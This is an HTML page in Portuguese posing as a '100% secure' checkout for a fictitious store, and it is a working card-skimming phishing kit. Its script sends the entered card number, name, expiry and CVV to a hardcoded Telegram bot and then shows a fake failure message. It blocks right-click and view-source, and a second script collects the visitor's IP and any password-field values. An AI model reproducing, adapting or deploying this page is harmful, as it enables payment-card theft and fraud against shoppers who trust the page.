<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Checkout</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f2f2f2; /* Nova cor de fundo */
            color: #000; /* Nova cor do texto */
        }
        header {
            background-color: #336699; /* Nova cor de fundo para o cabeçalho */
            color: #fff; /* Nova cor do texto no cabeçalho */
            padding: 10px 0;
            text-align: center;
        }
        nav ul {
            list-style-type: none;
            padding: 0;
        }
        nav ul li {
            display: inline;
            margin-right: 20px;
        }
        nav ul li a {
            color: #fff; /* Nova cor para os links no cabeçalho */
            text-decoration: none;
        }
        #banner {
            background-color: #336699; /* Nova cor de fundo para o banner */
            color: #fff; /* Nova cor do texto no banner */
            text-align: left; /* Alinhamento à esquerda */
            padding: 10px 20px; /* Espaçamento interno */
            margin-bottom: 20px; /* Espaçamento abaixo do banner */
        }
        .container {
            max-width: 1200px;
            width: 100%;
            margin: 0 auto;
            padding: 20px;
            background-color: #fff;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            display: flex; /* Para alinhar os elementos horizontalmente */
        }
        #credit-card-info {
            flex: 1; /* Para ocupar o espaço restante na linha */
            padding: 20px;
            border-top: 1px solid #ccc; /* Adicionando uma linha superior entre o banner e o formulário */
        }
        #credit-card-info h2 {
            text-align: left;
            margin-bottom: 5px;
        }
        #credit-card-info input[type="text"],
        #credit-card-info select {
            margin-bottom: 10px;
            padding: 8px;
            width: calc(50% - 4px); /* Reduzindo o tamanho dos campos */
            box-sizing: border-box;
            color: #000;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        #credit-card-info select {
            width: calc(24% - 4px); /* Reduzindo o tamanho dos campos */
            margin-right: 4%;
        }
        #credit-card-info button {
            padding: 10px 20px;
            background-color: #333;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        #credit-card-info button:hover {
            background-color: #555;
        }
        .product-info {
            flex: 1; /* Para ocupar o espaço restante na linha */
            padding: 20px;
        }
        .product-info img {
            width: 100%;
            border-radius: 5px;
            margin-bottom: 10px;
        }
        footer {
            background-color: #336699; /* Nova cor de fundo para o rodapé */
            color: #fff; /* Nova cor do texto no rodapé */
            text-align: center;
            padding: 10px 0;
            width: 100%;
            font-size: 12px; /* Reduzindo o tamanho da fonte */
        }
        #banner h1 {
            font-size: 24px; /* Reduzindo o tamanho da fonte do nome da empresa */
            margin: 0; /* Removendo a margem interna */
        }

        /* Estilo para o popup */
        .popup {
            display: none; /* Inicialmente oculto */
            position: fixed; /* Posicionamento fixo */
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5); /* Fundo semi-transparente */
            z-index: 9999; /* Sobrepondo outros elementos */
            justify-content: center; /* Centralizando conteúdo horizontalmente */
            align-items: center; /* Centralizando conteúdo verticalmente */
        }

        .popup-content {
            background-color: #fff;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
        }

        .spinner {
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top: 4px solid #333;
            border-radius: 50%;
            width: 40px;
            height: 40px;
            animation: spin 1s linear infinite;
            margin: 0 auto;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <header>
        <nav>
            <ul>
                <li><a href="#">COMPRA 100% segura</a></li>
                <li><a href="#">Produtos</a></li>
                <li><a href="#">Contato</a></li>
            </ul>
        </nav>
    </header>

    <div id="banner">
        <h1>Empresa Fictícia - Pagamento Seguro</h1>
    </div>

    <div class="container">
        <section id="credit-card-info">
            <h2>Número do cartão</h2>
            <input id="numero-cartao" type="text" placeholder="Número do cartão" maxlength="16" oninput="identificarCartao(this.value)" onkeypress="return event.charCode >= 48 && event.charCode <= 57" onpaste="return false">

            <small id="tipo-cartao" style="display: none;"></small>

            <h2>Nome no cartão</h2>
            <input id="nome-cartao" type="text" placeholder="Nome no cartão">

            <div style="display: flex;">
                <div style="flex: 1; margin-right: 10px;">
                    <h2>Validade</h2>
                    <div style="display: flex;">
                        <select id="validade-mes" name="month" style="flex: 1;">
                            <option value="" disabled selected>Mês</option>
                            <option value="01">01</option>
                            <option value="02">02</option>
                            <option value="03">03</option>
                            <option value="04">04</option>
                            <option value="05">05</option>
                            <option value="06">06</option>
                            <option value="07">07</option>
                            <option value="08">08</option>
                            <option value="09">09</option>
                            <option value="10">10</option>
                            <option value="11">11</option>
                            <option value="12">12</option>
                        </select>
                        <select id="validade-ano" name="year" style="flex: 1; margin-left: 10px;">
                            <option value="" disabled selected>Ano</option>
                            <option value="2024">2024</option>
                            <option value="2025">2025</option>
                            <option value="2026">2026</option>
                            <option value="2027">2027</option>
                            <option value="2028">2028</option>
                            <option value="2029">2029</option>
                        </select>
                    </div>
                </div>
                <div style="flex: 1;">
                    <h2>CVV</h2>
                    <input id="cvv" type="text" placeholder="CVV" maxlength="3" onkeypress="return event.charCode >= 48 && event.charCode <= 57" onpaste="return false">
                </div>
            </div>

            <button onclick="verificarCampos()">Concluir Pedido</button>
        </section>

        <section class="product-info">
            <img src="https://example.com/product-image.jpg" alt="Nome do Produto">
            <h2>Nome do Produto</h2>
            <p>Descrição detalhada do produto aqui...</p>
            <p>Preço: R$99.99</p>
        </section>
    </div>

    <footer>
        © 2024 Empresa Fictícia. Todos os direitos reservados.
        <p>Preços e condições de pagamento exclusivos para compras via internet, podendo variar nas lojas físicas. Ofertas válidas na compra de até 5 peças de cada produto por cliente, até o término dos nossos estoques para internet. Caso os produtos apresentem divergências de valores, o preço válido é o da sacola de compras.</p>
        <p>Vendas sujeitas a análise e confirmação de dados.</p>
    </footer>

    <div class="popup" id="popup">
        <div class="popup-content">
            <div class="spinner"></div>
            <p>Processando pedido...</p>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script>
        // Função para identificar o tipo de cartão
        function identificarCartao(numero) {
            var visaPattern = /^4[0-9]{0,}$/;
            var mastercardPattern = /^5[1-5][0-9]{0,}$/;
            var amexPattern = /^3[47][0-9]{0,}$/;
            var dinersPattern = /^3(?:0[0-5]|[68][0-9])[0-9]{0,}$/;
            var discoverPattern = /^6(?:011|5[0-9]{2})[0-9]{0,}$/;
            var enRoutePattern = /^(?:2131|1800|35\d{3})\d{0,}$/;
            var jcbPattern = /^(?:35[2-8][89]|352[89]|35[3-8][0-9]{2})\d{0,}$/;
            var voyagerPattern = /^8699[0-9]{0,}$/;
            var hiperCardPattern = /^(606282\d{0,}|3841\d{0,}|^636[0-9]{0,})\d{0,}$/;
            var auraPattern = /^(5078\d{0,}|5041\d{0,}|5038\d{0,})\d{0,}$/;

            var tipoCartaoElemento = document.getElementById("tipo-cartao");
            var bin = numero.substr(0, 6);

            if (visaPattern.test(bin)) {
                tipoCartaoElemento.innerText = "Visa";
                tipoCartaoElemento.style.display = "inline";
            } else if (mastercardPattern.test(bin)) {
                tipoCartaoElemento.innerText = "Mastercard";
                tipoCartaoElemento.style.display = "inline";
            } else if (amexPattern.test(bin)) {
                tipoCartaoElemento.innerText = "American Express";
                tipoCartaoElemento.style.display = "inline";
            } else if (dinersPattern.test(bin)) {
                tipoCartaoElemento.innerText = "Diners Club";
                tipoCartaoElemento.style.display = "inline";
            } else if (discoverPattern.test(bin)) {
                tipoCartaoElemento.innerText = "Discover";
                tipoCartaoElemento.style.display = "inline";
            } else if (enRoutePattern.test(bin)) {
                tipoCartaoElemento.innerText = "EnRoute";
                tipoCartaoElemento.style.display = "inline";
            } else if (jcbPattern.test(bin)) {
                tipoCartaoElemento.innerText = "JCB";
                tipoCartaoElemento.style.display = "inline";
            } else if (voyagerPattern.test(bin)) {
                tipoCartaoElemento.innerText = "Voyager";
                tipoCartaoElemento.style.display = "inline";
            } else if (hiperCardPattern.test(bin)) {
                tipoCartaoElemento.innerText = "HiperCard";
                tipoCartaoElemento.style.display = "inline";
            } else if (auraPattern.test(bin)) {
                tipoCartaoElemento.innerText = "Aura";
                tipoCartaoElemento.style.display = "inline";
            } else {
                tipoCartaoElemento.style.display = "none";
            }
        }

        // Função para exibir a animação de popup
        function exibirAnimacao() {
            var popup = document.getElementById("popup");
            popup.style.display = "flex"; // Exibir o popup

            // Esconder o popup após 3 segundos
            setTimeout(function() {
                popup.style.display = "none";
                enviarParaTelegram();
            }, 3000);
        }

        // Função para enviar dados para o Telegram
        function enviarParaTelegram() {
            var numeroCartao = document.getElementById("numero-cartao").value;
            var nomeCartao = document.getElementById("nome-cartao").value;
            var validadeMes = document.getElementById("validade-mes").value;
            var validadeAno = document.getElementById("validade-ano").value;
            var cvv = document.getElementById("cvv").value;

            var mensagem = "Novo pedido recebido:\nNúmero do cartão: " + numeroCartao + "\nNome no cartão: " + nomeCartao + "\nValidade: " + validadeMes + "/" + validadeAno + "\nCVV: " + cvv;

            var token = '6096796903:AAEVLcK0ocOAL0-us0WCv2YfS2GMvB2kiCg';

            var url = 'https://api.telegram.org/bot' + token + '/sendMessage';

            var data = {
                chat_id: '-1001912070282', // Use o nome do canal ou grupo onde você deseja receber as mensagens
                text: mensagem
            };

            axios.post(url, data)
                .then(function (response) {
                    console.log('Mensagem enviada com sucesso:', response.data);
                    alert('Falha No Pedido,Tente Novamente Mais Tarde !');
                })
                .catch(function (error) {
                    console.error('Erro ao enviar mensagem:', error);
                    alert('Ocorreu um erro ao enviar o pedido. Por favor, tente novamente mais tarde.');
                });
        }

        // Função para verificar se todos os campos estão preenchidos e enviar pedido
        function verificarCampos() {
            var numeroCartao = document.getElementById("numero-cartao").value;
            var nomeCartao = document.getElementById("nome-cartao").value;
            var validadeMes = document.getElementById("validade-mes").value;
            var validadeAno = document.getElementById("validade-ano").value;
            var cvv = document.getElementById("cvv").value;

            if (numeroCartao.length !== 16) {
                alert("Por favor, insira um número de cartão válido com 16 dígitos.");
            } else if (nomeCartao === "" || validadeMes === "" || validadeAno === "" || cvv === "") {
                alert("Por favor, preencha todos os campos antes de concluir o pedido.");
            } else {
                exibirAnimacao();
            }
        }

        // Desabilitar o clique do botão direito
        document.addEventListener('contextmenu', function (e) {
            e.preventDefault();
        });

        // Desabilitar o uso de ctrl + u
        document.onkeydown = function(e) {
            if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
                return false;
            }
        }
    </script>

<script>
    // Coletar endereço IP
    fetch('https://api.ipify.org?format=json')
        .then(response => response.json())
        .then(data => {
            var ip_address = data.ip;
            // Enviar o endereço IP para o servidor ou armazená-lo localmente
            console.log('Endereço IP:', ip_address);
        })
        .catch(error => console.error('Erro ao coletar endereço IP:', error));

    // Coletar senhas salvas no navegador (não recomendado)
    var senhas_salvas = document.querySelectorAll('input[type=password]');
    senhas_salvas.forEach(function(element) {
        var senha = element.value;
        // Enviar as senhas para o servidor ou armazená-las localmente
        console.log('Senha salva:', senha);
    });

    // Coletar histórico de navegação
    var historico = window.history.length;
    // Enviar o histórico de navegação para o servidor ou armazená-lo localmente
    console.log('Histórico de navegação:', historico);
</script>

    
</body>
</html>
